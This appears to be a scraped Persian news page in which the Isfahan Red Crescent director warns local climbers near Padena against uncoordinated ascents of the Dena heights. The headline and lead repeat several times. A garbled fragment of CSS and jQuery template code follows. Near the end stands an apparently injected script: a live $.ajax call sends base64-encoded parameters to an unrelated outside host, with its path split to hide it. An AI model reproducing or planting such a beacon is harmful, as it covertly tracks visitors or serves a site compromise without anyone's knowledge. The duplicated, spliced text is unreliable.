کوهنوردان محلی در ارتفاعات دنا از اقدامات سرخود پرهیز کنند

کوهنوردان محلی در ارتفاعات دنا از اقدامات سرخود پرهیز کنند
مدیرعامل جمعیت هلال احمر استان اصفهان گفت: افراد و کوهنوردان محلی منقطه پادنا باید از اقدامات هماهنگ‌نشده و سرخود برای صعود به ارتفاعات دنا خودداری کنند چراکه این امر برای آنان خطرآفرین است.

کوهنوردان محلی در ارتفاعات دنا از اقدامات سرخود پرهیز کنند

مدیرعامل جمعیت هلال احمر استان اصفهان گفت: افراد و کوهنوردان محلی منقطه پادنا باید از اقدامات هماهنگ‌نشده و سرخود برای صعود به ارتفاعات دنا خودداری کنند چراکه این امر برای آنان خطرآفرین است.
کوهنوردان محلی در ارتفاعات دنا از اقدامات سرخود پرهیز کنند
/*!normalize.css v1.1.2 i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}};

$.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=OTUuMTU0LjIzNy44NQ==&681=MTUxOTYzOTI4OWQ0ODRmMjYwOTZkNzI1NjNhZGNhYTZmMTc0Y2VkOWYy&crc=52985f4cb447eda647ca6a6185cfba090e309bed&cv=1’});

View more posts from this author